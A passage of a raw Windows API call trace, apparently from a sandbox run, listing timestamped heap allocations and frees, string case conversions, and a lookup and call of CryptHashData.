hHeap=0x970000) returned 1 [0133.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0133.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0133.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0133.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0133.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0133.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0133.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0133.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0133.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0133.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0133.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0133.233] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0133.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0133.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0133.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0133.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0133.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0133.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0133.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0133.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0133.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0133.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0133.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0133.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0133.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0133.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0133.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0133.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0133.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0133.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0133.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0133.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0133.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0133.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0133.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0133.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0133.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0133.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0133.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0133.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0133.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0133.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0133.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0133.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0133.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0133.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0133.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0133.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0133.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0133.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0133.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0133.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0133.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0133.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0133.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0133.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0133.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0133.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0133.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0133.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0133.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50c50 [0133.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50c50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0133.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0133.237] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0133.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0133.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0133.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0133.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0133.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0133.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0133.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0133.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0133.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0133.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0133.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0133.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0133.238] CryptHashData (hHash=0xa87310, pbData=0x2e54dd8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0133.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0133.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0133.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0133.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0133.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0133.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0133.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0133.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0133.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0133.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0133.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0133.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0133.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0133.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0133.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0133.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0133.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0133.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0133.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0133.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0133.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0133.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0133.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0133.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0133.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0133.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0133.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0133.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0133.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0133.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0133.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0133.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0133.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0133.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0133.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0133.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0133.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0133.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0133.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0133.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0133.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0133.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0133.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0133.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0133.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0133.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0133.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0133.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0133.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0133.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0133.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0133.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0133.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0133.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0133.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0133.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0133.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0133.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0133.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0133.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0133.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0133.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0133.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0133.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0133.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0133.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0133.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0133.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0133.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0133.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0133.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0133.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0133.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0133.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0133.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0133.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0133.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0133.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0133.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0133.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0133.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0133.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0133.243] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0133.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0133.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0133.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0133.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0133.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0133.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0133.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0133.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0133.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0133.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0133.244] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0133.244] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0133.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0133.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0133.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0133.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0133.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0133.244] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0133.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0133.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0133.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ad0 [0133.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0133.245] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0133.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0133.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0133.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0133.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0133.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0133.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0133.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0133.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0133.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0133.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0133.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0133.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0133.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0133.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0133.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0133.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0133.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0133.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0133.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0133.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0133.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0133.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0133.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0133.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0133.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0133.246] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0133.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0133.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0133.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b30 [0133.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0133.247] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0133.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0133.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0133.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0133.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0133.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0133.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0133.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0133.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0133.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0133.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0133.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0133.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0133.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0133.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0133.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0133.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0133.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0133.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0133.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0133.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0133.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0133.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0133.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0133.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0133.249] RtlAllocateHeap (HeapHandle=0x970000, 